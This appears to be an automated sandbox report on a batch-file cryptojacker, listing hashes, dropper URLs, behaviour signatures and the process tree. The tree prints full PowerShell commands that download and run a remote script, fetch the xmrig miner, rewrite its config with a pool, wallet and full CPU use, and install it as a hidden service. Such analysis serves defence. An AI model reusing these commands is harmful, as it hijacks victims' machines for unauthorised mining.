Analysis

  • max time kernel
    1s
  • max time network
    138s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-07-2024 03:51

General

  • Target

    27606237422172.bat

  • Size

    517B

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Stops running service(s) 4 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 64 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\27606237422172.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4328
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpECC1.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
          PID:4424
          • C:\Windows\system32\net.exe
            net session
            4⤵
              PID:232
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 session
                5⤵
                  PID:1836
              • C:\Windows\system32\where.exe
                where powershell
                4⤵
                  PID:2320
                • C:\Windows\system32\where.exe
                  where find
                  4⤵
                    PID:632
                  • C:\Windows\system32\where.exe
                    where findstr
                    4⤵
                      PID:1860
                    • C:\Windows\system32\where.exe
                      where tasklist
                      4⤵
                        PID:3280
                      • C:\Windows\system32\where.exe
                        where sc
                        4⤵
                          PID:4660
                        • C:\Windows\system32\sc.exe
                          sc stop moneroocean_miner
                          4⤵
                          • Launches sc.exe
                          PID:4272
                        • C:\Windows\system32\sc.exe
                          sc delete moneroocean_miner
                          4⤵
                          • Launches sc.exe
                          PID:3336
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /t /im xmrig.exe
                          4⤵
                          • Kills process with taskkill
                          PID:4268
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:556
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1252
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1900
                        • C:\Users\Admin\moneroocean\xmrig.exe
                          "C:\Users\Admin\moneroocean\xmrig.exe" --help
                          4⤵
                            PID:3580
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                            4⤵
                              PID:1472
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:2460
                                • C:\Windows\system32\HOSTNAME.EXE
                                  "C:\Windows\system32\HOSTNAME.EXE"
                                  6⤵
                                    PID:836
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:1152
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:2388
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gkutwgdf\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:196
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:2508
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:4280
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:2464
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3568
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:4372
                              • C:\Windows\system32\sc.exe
                                sc stop moneroocean_miner
                                4⤵
                                • Launches sc.exe
                                PID:208
                              • C:\Windows\system32\sc.exe
                                sc delete moneroocean_miner
                                4⤵
                                • Launches sc.exe
                                PID:1444
                              • C:\Users\Admin\moneroocean\nssm.exe
                                "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                                4⤵
                                  PID:1572
                                • C:\Users\Admin\moneroocean\nssm.exe
                                  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                                  4⤵
                                    PID:4324
                                  • C:\Users\Admin\moneroocean\nssm.exe
                                    "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                                    4⤵
                                      PID:1392
                                    • C:\Users\Admin\moneroocean\nssm.exe
                                      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                                      4⤵
                                        PID:3180
                                      • C:\Users\Admin\moneroocean\nssm.exe
                                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                                        4⤵
                                          PID:2568
                                        • C:\Users\Admin\moneroocean\nssm.exe
                                          "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                                          4⤵
                                            PID:2172
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                        2⤵
                                          PID:4388
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic cpu get loadpercentage
                                            3⤵
                                              PID:2968
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:3372
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                            2⤵
                                              PID:4748
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get loadpercentage
                                                3⤵
                                                  PID:4284
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 1
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:1396
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                2⤵
                                                  PID:692
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic cpu get loadpercentage
                                                    3⤵
                                                      PID:4504
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 1
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:3168
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                    2⤵
                                                      PID:3600
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic cpu get loadpercentage
                                                        3⤵
                                                          PID:4004
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 1
                                                        2⤵
                                                        • Delays execution with timeout.exe
                                                        PID:944
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                        2⤵
                                                          PID:2132
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic cpu get loadpercentage
                                                            3⤵
                                                              PID:1104
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 1
                                                            2⤵
                                                            • Delays execution with timeout.exe
                                                            PID:416
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                            2⤵
                                                              PID:3132
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic cpu get loadpercentage
                                                                3⤵
                                                                  PID:5108
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 1
                                                                2⤵
                                                                • Delays execution with timeout.exe
                                                                PID:2488
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                2⤵
                                                                  PID:3224
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic cpu get loadpercentage
                                                                    3⤵
                                                                      PID:3484
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 1
                                                                    2⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:2604
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                    2⤵
                                                                      PID:1720
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic cpu get loadpercentage
                                                                        3⤵
                                                                          PID:1900
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 1
                                                                        2⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:2404
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                        2⤵
                                                                          PID:4184
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic cpu get loadpercentage
                                                                            3⤵
                                                                              PID:1168
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 1
                                                                            2⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:1028
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                            2⤵
                                                                              PID:836
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic cpu get loadpercentage
                                                                                3⤵
                                                                                  PID:4784
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                2⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:3916
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                2⤵
                                                                                  PID:1992
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic cpu get loadpercentage
                                                                                    3⤵
                                                                                      PID:1472
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout /t 1
                                                                                    2⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:1660
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                    2⤵
                                                                                      PID:5076
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic cpu get loadpercentage
                                                                                        3⤵
                                                                                          PID:1872
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 1
                                                                                        2⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4348
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                        2⤵
                                                                                          PID:2492
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic cpu get loadpercentage
                                                                                            3⤵
                                                                                              PID:2068
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 1
                                                                                            2⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:3728
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                            2⤵
                                                                                              PID:5064
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic cpu get loadpercentage
                                                                                                3⤵
                                                                                                  PID:3932
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 1
                                                                                                2⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:4676
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                2⤵
                                                                                                  PID:2976
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic cpu get loadpercentage
                                                                                                    3⤵
                                                                                                      PID:4536
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 1
                                                                                                    2⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:2268
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                    2⤵
                                                                                                      PID:808
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic cpu get loadpercentage
                                                                                                        3⤵
                                                                                                          PID:1572
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout /t 1
                                                                                                        2⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:4224
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                        2⤵
                                                                                                          PID:4120
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic cpu get loadpercentage
                                                                                                            3⤵
                                                                                                              PID:388
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 1
                                                                                                            2⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:4272
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                            2⤵
                                                                                                              PID:904
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic cpu get loadpercentage
                                                                                                                3⤵
                                                                                                                  PID:4304
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 1
                                                                                                                2⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:1704
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                2⤵
                                                                                                                  PID:3796
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic cpu get loadpercentage
                                                                                                                    3⤵
                                                                                                                      PID:248
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 1
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:4128
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                    2⤵
                                                                                                                      PID:5024
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic cpu get loadpercentage
                                                                                                                        3⤵
                                                                                                                          PID:4708
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        timeout /t 1
                                                                                                                        2⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:3772
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                        2⤵
                                                                                                                          PID:4328
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic cpu get loadpercentage
                                                                                                                            3⤵
                                                                                                                              PID:556
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout /t 1
                                                                                                                            2⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:2652
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                            2⤵
                                                                                                                              PID:2672
                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                3⤵
                                                                                                                                  PID:3696
                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                timeout /t 1
                                                                                                                                2⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:4296
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                2⤵
                                                                                                                                  PID:864
                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                    3⤵
                                                                                                                                      PID:2656
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout /t 1
                                                                                                                                    2⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:4840
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                    2⤵
                                                                                                                                      PID:4320
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                        3⤵
                                                                                                                                          PID:1676
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 1
                                                                                                                                        2⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:5060
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                        2⤵
                                                                                                                                          PID:4872
                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                            3⤵
                                                                                                                                              PID:3036
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 1
                                                                                                                                            2⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:2132
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                            2⤵
                                                                                                                                              PID:4556
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                3⤵
                                                                                                                                                  PID:3216
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                timeout /t 1
                                                                                                                                                2⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:5108
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                2⤵
                                                                                                                                                  PID:2120
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3608
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    timeout /t 1
                                                                                                                                                    2⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:2876
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3484
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                        3⤵
                                                                                                                                                          PID:384
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        timeout /t 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:3396
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2032
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2416
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3736
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1168
                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3488
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 1
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:2700
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:836
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1616
                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                      timeout /t 1
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:3480
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4540
                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1796
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          timeout /t 1
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:4696
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1872
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5092
                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                              timeout /t 1
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                              PID:4752
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2068
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3068
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:2136
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5104
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1364
                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:4452
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2224
                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4340
                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:2584
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1836
                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4688
                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:5088
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2568
                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3184
